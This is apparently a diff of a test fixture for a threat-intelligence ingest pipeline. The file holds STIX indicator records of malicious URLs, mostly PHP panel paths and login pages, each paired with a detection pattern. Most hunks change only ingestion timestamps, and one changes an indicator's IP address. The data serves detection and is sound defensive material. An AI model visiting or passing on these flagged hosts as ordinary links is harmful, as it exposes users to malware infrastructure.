Source: CyberCrime\",\"id\":\"indicator--c48537ec-9991-441c-89e6-f41295aa8b88\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-23T02:52:31.664Z\",\"name\":\"mal_url: http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:31.664Z\"}", "category": "threat", "type": "indicator", 
@@ -27979,7 +27979,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389711729Z", + "ingested": "2021-12-13T08:38:40.026217700Z", "original": "{\"created\":\"2020-02-23T02:52:36.705Z\",\"description\":\"TS ID: 55342497265; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c580668f-1fd0-49e7-bea8-fe3effa1854a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:52:36.705Z\",\"name\":\"mal_url: http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:36.705Z\"}", "category": "threat", "type": "indicator", @@ -28031,7 +28031,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389715857Z", + "ingested": "2021-12-13T08:38:40.026221100Z", "original": "{\"created\":\"2020-02-23T02:52:38.725Z\",\"description\":\"TS ID: 55342497253; iType: mal_url; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime\",\"id\":\"indicator--97f5e99e-bdb3-4f2e-b9e6-b820f6c6e17c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-23T02:52:38.725Z\",\"name\":\"mal_url: http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:38.725Z\"}", "category": "threat", "type": "indicator", 
@@ -28083,7 +28083,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389719724Z", + "ingested": "2021-12-13T08:38:40.026226800Z", "original": "{\"created\":\"2020-02-23T02:52:43.45Z\",\"description\":\"TS ID: 55342497299; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--53d3da3c-985b-4045-bb67-cac32740c8a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:52:43.45Z\",\"name\":\"mal_url: http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:43.45Z\"}", "category": "threat", "type": "indicator", @@ -28135,7 +28135,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389723662Z", + "ingested": "2021-12-13T08:38:40.026231600Z", "original": "{\"created\":\"2020-02-23T02:52:44.281Z\",\"description\":\"TS ID: 55342497255; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--19faa6b5-809f-4a97-9415-10aa8711a095\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-23T02:52:44.281Z\",\"name\":\"mal_url: http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:44.281Z\"}", "category": "threat", "type": "indicator", 
@@ -28186,7 +28186,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389727359Z", + "ingested": "2021-12-13T08:38:40.026255Z", "original": "{\"created\":\"2020-02-23T02:52:46.455Z\",\"description\":\"TS ID: 55342497238; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--f023fd7f-9128-4b43-b8a4-4e18a33dbbf0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:52:46.455Z\",\"name\":\"mal_url: http://f0405406.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0405406.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:46.455Z\"}", "category": "threat", "type": "indicator", @@ -28238,7 +28238,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389731496Z", + "ingested": "2021-12-13T08:38:40.026285Z", "original": "{\"created\":\"2020-02-23T02:52:55.747Z\",\"description\":\"TS ID: 55342497297; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--15290dad-dffe-413d-b14c-e1bcbf9c5f62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:52:55.747Z\",\"name\":\"mal_url: http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:55.747Z\"}", "category": "threat", "type": "indicator", 
@@ -28290,7 +28290,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389735243Z", + "ingested": "2021-12-13T08:38:40.026290800Z", "original": "{\"created\":\"2020-02-23T02:53:08.502Z\",\"description\":\"TS ID: 55342497311; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--d04b02bf-6282-4889-95d0-bcebf5f7f3a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:53:08.502Z\",\"name\":\"mal_url: http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.502Z\"}", "category": "threat", "type": "indicator", @@ -28342,7 +28342,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389739291Z", + "ingested": "2021-12-13T08:38:40.026296300Z", "original": "{\"created\":\"2020-02-23T02:53:08.537Z\",\"description\":\"TS ID: 55342497243; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--b3da183c-cefb-4014-bc60-b838648be7b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-23T02:53:08.537Z\",\"name\":\"mal_url: http://mez.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mez.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.537Z\"}", "category": "threat", "type": "indicator", 
@@ -28394,7 +28394,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389742868Z", + "ingested": "2021-12-13T08:38:40.026320500Z", "original": "{\"created\":\"2020-02-23T02:53:08.568Z\",\"description\":\"TS ID: 55342497237; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f18c4197-55ad-4dba-beaf-8b57fd984245\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-23T02:53:08.568Z\",\"name\":\"mal_url: http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.568Z\"}", "category": "threat", "type": "indicator", @@ -28446,7 +28446,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389746324Z", + "ingested": "2021-12-13T08:38:40.026327400Z", "original": "{\"created\":\"2020-02-23T02:53:09.543Z\",\"description\":\"TS ID: 55342497304; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a11a5e52-cd1d-4891-96a6-a9b78a260843\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:09.543Z\",\"name\":\"mal_url: http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.543Z\"}", "category": "threat", "type": "indicator", 
@@ -28498,7 +28498,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389749961Z", + "ingested": "2021-12-13T08:38:40.026331500Z", "original": "{\"created\":\"2020-02-23T02:53:09.578Z\",\"description\":\"TS ID: 55342497256; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--a5c5b970-919b-4464-b7db-694194d08632\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:53:09.578Z\",\"name\":\"mal_url: http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.578Z\"}", "category": "threat", "type": "indicator", @@ -28550,7 +28550,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390279966Z", + "ingested": "2021-12-13T08:38:40.026336300Z", "original": "{\"created\":\"2020-02-23T02:53:09.612Z\",\"description\":\"TS ID: 55342497234; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--60a33c8d-316e-4688-b9f8-e68c82aa36b3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:09.612Z\",\"name\":\"mal_url: http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.612Z\"}", "category": "threat", "type": "indicator", 
@@ -28601,7 +28601,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390292019Z", + "ingested": "2021-12-13T08:38:40.026342100Z", "original": "{\"created\":\"2020-02-23T02:53:12.354Z\",\"description\":\"TS ID: 55342497239; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1d8670e2-50f8-4595-bdb1-7152df77d2a7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:53:12.354Z\",\"name\":\"mal_url: http://f0405230.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0405230.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:12.354Z\"}", "category": "threat", "type": "indicator", @@ -28653,7 +28653,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390298020Z", + "ingested": "2021-12-13T08:38:40.026347400Z", "original": "{\"created\":\"2020-02-23T02:53:17.566Z\",\"description\":\"TS ID: 55342497249; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime\",\"id\":\"indicator--f04e05b1-5cb4-4e30-8d2e-0e1b1bae7523\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:53:17.566Z\",\"name\":\"mal_url: http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:17.566Z\"}", "category": "threat", "type": "indicator", 
@@ -28705,7 +28705,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390302759Z", + "ingested": "2021-12-13T08:38:40.026351300Z", "original": "{\"created\":\"2020-02-23T02:53:19.805Z\",\"description\":\"TS ID: 55342497293; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ebf656cd-162d-40e8-8c3a-272285600583\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:53:19.805Z\",\"name\":\"mal_url: http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:19.805Z\"}", "category": "threat", "type": "indicator", @@ -28724,7 +28724,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://193.142.59.109/primone/logs/omc.php", + "name": "mal_url: http://89.160.20.156/primone/logs/omc.php", "description": "TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-23T02:53:27.698Z", "valid_from": "2020-02-23T02:53:27.698Z", 
@@ -28749,16 +28749,16 @@ "url": { "path": "/primone/logs/omc.php", "extension": "php", - "original": "http://193.142.59.109/primone/logs/omc.php", + "original": "http://89.160.20.156/primone/logs/omc.php", "scheme": "http", - "domain": "193.142.59.109", - "full": "http://193.142.59.109/primone/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/primone/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390306957Z", - "original": "{\"created\":\"2020-02-23T02:53:27.698Z\",\"description\":\"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-23T02:53:27.698Z\",\"name\":\"mal_url: http://193.142.59.109/primone/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://193.142.59.109/primone/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:27.698Z\"}", + "ingested": "2021-12-13T08:38:40.026356700Z", + "original": "{\"created\":\"2020-02-23T02:53:27.698Z\",\"description\":\"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-23T02:53:27.698Z\",\"name\":\"mal_url: http://89.160.20.156/primone/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primone/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:27.698Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28809,7 +28809,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390310674Z", + "ingested": "2021-12-13T08:38:40.026363600Z", "original": "{\"created\":\"2020-02-23T02:53:27.735Z\",\"description\":\"TS ID: 55342497263; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ff626727-4888-4cba-9257-470f0a70891a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:27.735Z\",\"name\":\"mal_url: http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:27.735Z\"}", "category": "threat", "type": "indicator", @@ -28861,7 +28861,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390314581Z", + "ingested": "2021-12-13T08:38:40.026368Z", "original": "{\"created\":\"2020-02-23T02:53:40.401Z\",\"description\":\"TS ID: 55342497262; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--4ec240b7-0fb7-4d38-8312-841d8f43886b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:40.401Z\",\"name\":\"mal_url: http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.401Z\"}", "category": "threat", "type": "indicator", 
@@ -28913,7 +28913,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390318188Z", + "ingested": "2021-12-13T08:38:40.026372900Z", "original": "{\"created\":\"2020-02-23T02:53:40.432Z\",\"description\":\"TS ID: 55342497245; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9d14574f-9af7-493d-84a2-f631570f1940\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-23T02:53:40.432Z\",\"name\":\"mal_url: http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.432Z\"}", "category": "threat", "type": "indicator", @@ -28964,7 +28964,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390322165Z", + "ingested": "2021-12-13T08:38:40.026376300Z", "original": "{\"created\":\"2020-02-23T02:53:40.453Z\",\"description\":\"TS ID: 55342497232; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--e6333eb1-1ff7-4131-94cd-5e5d53bff58f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:53:40.453Z\",\"name\":\"mal_url: http://mactreher.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mactreher.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.453Z\"}", "category": "threat", "type": "indicator", 
@@ -29016,7 +29016,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390325552Z", + "ingested": "2021-12-13T08:38:40.026381200Z", "original": "{\"created\":\"2020-02-23T02:53:42.405Z\",\"description\":\"TS ID: 55342497305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c5e5054b-f15b-4c96-a753-3b3562f66488\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:42.405Z\",\"name\":\"mal_url: http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:42.405Z\"}", "category": "threat", "type": "indicator", @@ -29068,7 +29068,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390328928Z", + "ingested": "2021-12-13T08:38:40.026386800Z", "original": "{\"created\":\"2020-02-23T02:53:42.443Z\",\"description\":\"TS ID: 55342497235; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d672c0ee-1501-4276-bd9d-dbdd27a11a7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:42.443Z\",\"name\":\"mal_url: http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:42.443Z\"}", "category": "threat", "type": "indicator", 
@@ -29120,7 +29120,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390332575Z", + "ingested": "2021-12-13T08:38:40.026392500Z", "original": "{\"created\":\"2020-02-23T02:53:47.65Z\",\"description\":\"TS ID: 55342497244; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9ebd5fa7-5308-48f6-80a2-84c18572d4b6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-23T02:53:47.65Z\",\"name\":\"mal_url: http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:47.65Z\"}", "category": "threat", "type": "indicator", @@ -29172,7 +29172,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390336031Z", + "ingested": "2021-12-13T08:38:40.026399600Z", "original": "{\"created\":\"2020-02-23T02:53:53.437Z\",\"description\":\"TS ID: 55342497268; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e00da1fa-88c4-4327-b415-71d3499ab5d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:53.437Z\",\"name\":\"mal_url: http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:53.437Z\"}", "category": "threat", "type": "indicator", 
@@ -29224,7 +29224,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390339738Z", + "ingested": "2021-12-13T08:38:40.026406300Z", "original": "{\"created\":\"2020-02-23T02:54:02.069Z\",\"description\":\"TS ID: 55342497250; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--6d4b1407-6885-4030-beae-43747e458b8a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-23T02:54:02.069Z\",\"name\":\"mal_url: http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:02.069Z\"}", "category": "threat", "type": "indicator", @@ -29276,7 +29276,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390343105Z", + "ingested": "2021-12-13T08:38:40.026413Z", "original": "{\"created\":\"2020-02-23T02:54:09.172Z\",\"description\":\"TS ID: 55342497312; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--8dd72fce-4734-40a1-8e73-cf44c9319fe1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-23T02:54:09.172Z\",\"name\":\"mal_url: http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:09.172Z\"}", "category": "threat", "type": "indicator", 
@@ -29328,7 +29328,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390346601Z", + "ingested": "2021-12-13T08:38:40.026419700Z", "original": "{\"created\":\"2020-02-23T02:54:15.807Z\",\"description\":\"TS ID: 55342497294; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--27b834b0-4113-4eca-8989-d7ada85d0779\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:54:15.807Z\",\"name\":\"mal_url: http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:15.807Z\"}", "category": "threat", "type": "indicator", @@ -29380,7 +29380,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390350198Z", + "ingested": "2021-12-13T08:38:40.026426500Z", "original": "{\"created\":\"2020-02-23T02:54:17.76Z\",\"description\":\"TS ID: 55342497307; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--56334c71-2f84-4e09-a6cc-017577b99970\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:17.76Z\",\"name\":\"mal_url: http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:17.76Z\"}", "category": "threat", "type": "indicator", 
